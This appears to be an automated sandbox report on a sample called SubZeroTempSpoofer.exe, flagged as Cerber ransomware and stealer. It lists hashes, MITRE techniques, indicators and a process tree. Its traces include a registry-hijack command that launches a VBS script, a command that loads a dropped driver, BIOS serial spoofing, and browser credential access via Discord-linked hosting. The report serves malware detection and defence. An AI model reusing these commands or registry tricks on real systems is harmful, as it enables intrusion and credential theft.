cerber | 830911c62e119f783336370841718d96c5fffa236ec485b434b6de7dcaf6c46b

Analysis

max time kernel
600s
max time network
555s
platform
windows11-21h2_x64
resource
win11-20240214-en
resource tags

arch:x64arch:x86image:win11-20240214-enlocale:en-usos:windows11-21h2-x64system
submitted
18-02-2024 12:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SubZeroTempSpoofer.exe
Size

1.6MB
MD5

052449d155e679a80df0061fcc93e502
SHA1

b09e4fe7002c193cf42ba4da2499b77ae561c457
SHA256

830911c62e119f783336370841718d96c5fffa236ec485b434b6de7dcaf6c46b
SHA512

5472b8b4a98513c7aad5d98c1522439d3d48e054f6b4490bdee9698fcff48a3570d1bd1c7d4c2571c5584b9abf9e34db3060dd215895e856368f8fd26912e941
SSDEEP

24576:NWhpLZFBqScHobQ3EJEYFrk5FNQDdJVlDGUCbs+trje6B/F5b1ygR:N2pLZ3qScUQ3EJEYFrkufVlDGN4qVy

Score

10^/10

cerber persistence ransomware spyware stealer

Malware Config

Signatures

Cerber 8 IoCs

Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

ransomware cerber

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeRuntime.exetaskkill.exe

pid	process
3756	taskkill.exe
4020	taskkill.exe
3540	taskkill.exe
2368	taskkill.exe
2848	taskkill.exe
1300	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}	Runtime.exe
3736	taskkill.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

RuntimeDebugger.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WRrEZiRIPXRuRxAvhxagUYqysZS\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\WRrEZiRIPXRuRxAvhxagUYqysZS"	RuntimeDebugger.exe

Executes dropped EXE 7 IoCs

Processes:

RuntimeDebugger.exeSMBIOSRuntime.exeRuntime.exeAMIDEWIN64.exel3ks5em1.exechromedriver.exemsedgedriver.exe

pid process

4444 RuntimeDebugger.exe
3260 SMBIOSRuntime.exe
652 Runtime.exe
1168 AMIDEWIN64.exe
4064 l3ks5em1.exe
4448 chromedriver.exe
2572 msedgedriver.exe
Loads dropped DLL 1 IoCs

Processes:

AMIDEWIN64.exe

pid process

1168 AMIDEWIN64.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
4444	RuntimeDebugger.exe
3260	SMBIOSRuntime.exe
652	Runtime.exe
1168	AMIDEWIN64.exe
4064	l3ks5em1.exe
4448	chromedriver.exe
2572	msedgedriver.exe

pid	process
1168	AMIDEWIN64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

Processes:

flow	ioc
3	raw.githubusercontent.com
4	raw.githubusercontent.com
7	discord.com
54	discord.com
47	discord.com
1	raw.githubusercontent.com
1	discord.com
12	discord.com
44	discord.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

19 checkip.amazonaws.com

flow	ioc
19	checkip.amazonaws.com

Checks system information in the registry 2 TTPs 6 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedgedriver.exeSubZeroTempSpoofer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	msedgedriver.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	msedgedriver.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	SubZeroTempSpoofer.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer = "6GZLALYUK8FFSWX"	SubZeroTempSpoofer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	SubZeroTempSpoofer.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName = "6GZLAL"	SubZeroTempSpoofer.exe

Drops file in Program Files directory 4 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log	chrome.exe

Drops file in Windows directory 64 IoCs

Processes:

msedge.exechrome.exemsedge.exemsedge.exechrome.exechromedriver.exemsedgedriver.exechrome.exe

description	ioc	process
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Media History	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir4448_1736178681\ShaderCache\index	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Session Storage\000003.log	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\CrashpadMetrics-active.pma	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\SmartScreen\local\download_cache	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\LOCK	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\chrome_debug.log	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Visited Links	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\shared_proto_db\metadata\000001.dbtmp	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Sync Data\LevelDB\000001.dbtmp	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\DevToolsActivePort	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Cache\Cache_Data\data_2	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Session Storage\000003.log	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\shared_proto_db\000001.dbtmp	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\SmartScreen\local\warnStateCache	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Top Sites-journal	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Site Characteristics Database\000001.dbtmp	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Crashpad\settings.dat	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\ShaderCache\GPUCache\index	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\History	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Local State	chromedriver.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Sync Data\LevelDB\LOCK	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\DawnCache\data_1	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\shared_proto_db\MANIFEST-000001	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\GPUCache\data_3	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Preferences	msedgedriver.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Crashpad\settings.dat	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Safe Browsing Network\NetworkDataMigrated	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Visited Links	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Session Storage\CURRENT	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Code Cache\wasm\index	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\d2e14ccd-8cfc-4c3f-a94f-4054e186f02f.tmp	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Microsoft Edge.lnk	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\shared_proto_db\metadata\000003.log	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir4448_1736178681\GrShaderCache\index	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\GrShaderCache\data_1	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir4448_1736178681\ShaderCache\data_1	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Extension Scripts\LOCK	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Affiliation Database-journal	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Session Storage\000001.dbtmp	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Cache\Cache_Data\data_0	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\95a2f1f5-bb79-4c10-8993-c32d856df8e4.tmp	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Crashpad\metadata	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Variations	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Code Cache\wasm\index-dir\temp-index	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Site Characteristics Database\LOCK	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Session Storage\LOG	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Crashpad\settings.dat	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Code Cache\js\index	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Local Storage\leveldb\LOCK	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Session Storage\MANIFEST-000001	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\shared_proto_db\LOG	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\GPUCache\data_2	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\GPUCache\data_3	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Cache\Cache_Data\data_2	chrome.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Network\Reporting and NEL	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Site Characteristics Database\MANIFEST-000001	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Login Data	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\DevToolsActivePort	msedge.exe
File opened for modification	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\commerce_subscription_db\LOCK	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\GPUCache\data_2	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir4448_1736178681\Default\Session Storage\MANIFEST-000001	chrome.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\shared_proto_db\MANIFEST-000001	msedge.exe
File created	C:\Windows\SystemTemp\scoped_dir2572_1029341843\Default\Local Storage\leveldb\000003.log	msedge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

900 schtasks.exe

pid	process
900	schtasks.exe

Enumerates system info in registry 2 TTPs 14 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeSubZeroTempSpoofer.exemsedge.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSerialNumber = "12PAMR5CNO"	SubZeroTempSpoofer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSerialNumber	SubZeroTempSpoofer.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSerialNumber = "6PDP6EYU9M"	SubZeroTempSpoofer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SubZeroTempSpoofer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SubZeroTempSpoofer.exe

Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3756 taskkill.exe
4020 taskkill.exe
3540 taskkill.exe
2368 taskkill.exe
2848 taskkill.exe
1300 taskkill.exe
3736 taskkill.exe
3164 taskkill.exe

pid	process
3756	taskkill.exe
4020	taskkill.exe
3540	taskkill.exe
2368	taskkill.exe
2848	taskkill.exe
1300	taskkill.exe
3736	taskkill.exe
3164	taskkill.exe

Modifies registry class 8 IoCs

Processes:

reg.exemsedge.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3404610768-3912631216-307532709-1000_Classes\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3404610768-3912631216-307532709-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3404610768-3912631216-307532709-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3404610768-3912631216-307532709-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3404610768-3912631216-307532709-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3404610768-3912631216-307532709-1000_Classes\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3404610768-3912631216-307532709-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\halfhalf27041967.vbs"	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4228 PING.EXE

pid	process
4228	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

SubZeroTempSpoofer.exemsedge.exemsedge.exeAMIDEWIN64.exel3ks5em1.exemsedge.exeidentity_helper.exe

pid	process
4876	SubZeroTempSpoofer.exe
2036	msedge.exe
2036	msedge.exe
1644	msedge.exe
1644	msedge.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
4064	l3ks5em1.exe
4064	l3ks5em1.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
4484	msedge.exe
4484	msedge.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
800	identity_helper.exe
800	identity_helper.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe
1168	AMIDEWIN64.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

RuntimeDebugger.exe

pid process

4444 RuntimeDebugger.exe
660

pid	process
4444	RuntimeDebugger.exe
660

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

Processes:

msedge.exechrome.exemsedge.exe

pid	process
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1188	chrome.exe
1188	chrome.exe
2804	msedge.exe
2804	msedge.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

SubZeroTempSpoofer.exeRuntimeDebugger.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeAMIDEWIN64.exel3ks5em1.exeAUDIODG.EXEExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	4876	SubZeroTempSpoofer.exe
Token: SeLoadDriverPrivilege	4444	RuntimeDebugger.exe
Token: SeDebugPrivilege	3756	taskkill.exe
Token: SeDebugPrivilege	4020	taskkill.exe
Token: SeDebugPrivilege	3540	taskkill.exe
Token: SeDebugPrivilege	2368	taskkill.exe
Token: SeDebugPrivilege	2848	taskkill.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	3736	taskkill.exe
Token: SeDebugPrivilege	3164	taskkill.exe
Token: SeDebugPrivilege	1168	AMIDEWIN64.exe
Token: SeDebugPrivilege	4064	l3ks5em1.exe
Token: 33	4492	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4492	AUDIODG.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE
Token: SeShutdownPrivilege	3280	Explorer.EXE
Token: SeCreatePagefilePrivilege	3280	Explorer.EXE

Suspicious use of FindShellTrayWindow 30 IoCs

Processes:

msedge.exechrome.exemsedge.exeExplorer.EXE

pid	process
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1188	chrome.exe
1188	chrome.exe
2804	msedge.exe
3280	Explorer.EXE
2804	msedge.exe

Suspicious use of SendNotifyMessage 13 IoCs

Processes:

msedge.exeExplorer.EXE

pid	process
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
1644	msedge.exe
3280	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

AMIDEWIN64.exe

pid process

1168 AMIDEWIN64.exe

pid	process
1168	AMIDEWIN64.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

SubZeroTempSpoofer.execmd.exeSMBIOSRuntime.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeAMIDEWIN64.exe

description	pid	process	target process
PID 4876 wrote to memory of 1604	4876	SubZeroTempSpoofer.exe	cmd.exe
PID 4876 wrote to memory of 1604	4876	SubZeroTempSpoofer.exe	cmd.exe
PID 4876 wrote to memory of 1604	4876	SubZeroTempSpoofer.exe	cmd.exe
PID 1604 wrote to memory of 4444	1604	cmd.exe	RuntimeDebugger.exe
PID 1604 wrote to memory of 4444	1604	cmd.exe	RuntimeDebugger.exe
PID 4876 wrote to memory of 3260	4876	SubZeroTempSpoofer.exe	SMBIOSRuntime.exe
PID 4876 wrote to memory of 3260	4876	SubZeroTempSpoofer.exe	SMBIOSRuntime.exe
PID 3260 wrote to memory of 3592	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 3592	3260	SMBIOSRuntime.exe	cmd.exe
PID 3592 wrote to memory of 3756	3592	cmd.exe	taskkill.exe
PID 3592 wrote to memory of 3756	3592	cmd.exe	taskkill.exe
PID 3260 wrote to memory of 104	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 104	3260	SMBIOSRuntime.exe	cmd.exe
PID 104 wrote to memory of 4020	104	cmd.exe	taskkill.exe
PID 104 wrote to memory of 4020	104	cmd.exe	taskkill.exe
PID 3260 wrote to memory of 4412	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 4412	3260	SMBIOSRuntime.exe	cmd.exe
PID 4412 wrote to memory of 3540	4412	cmd.exe	taskkill.exe
PID 4412 wrote to memory of 3540	4412	cmd.exe	taskkill.exe
PID 3260 wrote to memory of 2580	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 2580	3260	SMBIOSRuntime.exe	cmd.exe
PID 2580 wrote to memory of 2368	2580	cmd.exe	taskkill.exe
PID 2580 wrote to memory of 2368	2580	cmd.exe	taskkill.exe
PID 3260 wrote to memory of 2272	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 2272	3260	SMBIOSRuntime.exe	cmd.exe
PID 2272 wrote to memory of 2848	2272	cmd.exe	taskkill.exe
PID 2272 wrote to memory of 2848	2272	cmd.exe	taskkill.exe
PID 3260 wrote to memory of 1768	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 1768	3260	SMBIOSRuntime.exe	cmd.exe
PID 1768 wrote to memory of 1300	1768	cmd.exe	taskkill.exe
PID 1768 wrote to memory of 1300	1768	cmd.exe	taskkill.exe
PID 3260 wrote to memory of 3636	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 3636	3260	SMBIOSRuntime.exe	cmd.exe
PID 3636 wrote to memory of 3736	3636	cmd.exe	taskkill.exe
PID 3636 wrote to memory of 3736	3636	cmd.exe	taskkill.exe
PID 3260 wrote to memory of 3520	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 3520	3260	SMBIOSRuntime.exe	cmd.exe
PID 3520 wrote to memory of 652	3520	cmd.exe	Runtime.exe
PID 3520 wrote to memory of 652	3520	cmd.exe	Runtime.exe
PID 3260 wrote to memory of 4540	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 4540	3260	SMBIOSRuntime.exe	cmd.exe
PID 4540 wrote to memory of 1168	4540	cmd.exe	AMIDEWIN64.exe
PID 4540 wrote to memory of 1168	4540	cmd.exe	AMIDEWIN64.exe
PID 4540 wrote to memory of 1168	4540	cmd.exe	AMIDEWIN64.exe
PID 3260 wrote to memory of 3056	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 3056	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 2212	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 2212	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 3348	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 3348	3260	SMBIOSRuntime.exe	cmd.exe
PID 3348 wrote to memory of 3164	3348	cmd.exe	taskkill.exe
PID 3348 wrote to memory of 3164	3348	cmd.exe	taskkill.exe
PID 3260 wrote to memory of 1156	3260	SMBIOSRuntime.exe	cmd.exe
PID 3260 wrote to memory of 1156	3260	SMBIOSRuntime.exe	cmd.exe
PID 1156 wrote to memory of 4228	1156	cmd.exe	PING.EXE
PID 1156 wrote to memory of 4228	1156	cmd.exe	PING.EXE
PID 1168 wrote to memory of 940	1168	AMIDEWIN64.exe	reg.exe
PID 1168 wrote to memory of 940	1168	AMIDEWIN64.exe	reg.exe
PID 1168 wrote to memory of 940	1168	AMIDEWIN64.exe	reg.exe
PID 1168 wrote to memory of 2456	1168	AMIDEWIN64.exe	reg.exe
PID 1168 wrote to memory of 2456	1168	AMIDEWIN64.exe	reg.exe
PID 1168 wrote to memory of 2456	1168	AMIDEWIN64.exe	reg.exe
PID 1168 wrote to memory of 708	1168	AMIDEWIN64.exe	cmd.exe
PID 1168 wrote to memory of 708	1168	AMIDEWIN64.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\SubZeroTempSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\SubZeroTempSpoofer.exe"
1⤵
- Checks system information in the registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Temp\RuntimeDebugger C:\Windows\Temp\BDagkEzSpU.sys >nul
2⤵
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\Temp\RuntimeDebugger.exe
C:\Windows\Temp\RuntimeDebugger C:\Windows\Temp\BDagkEzSpU.sys
3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4444

C:\Windows\SMBIOSRuntime.exe
"C:\Windows\SMBIOSRuntime.exe"
2⤵
- Executes dropped EXE
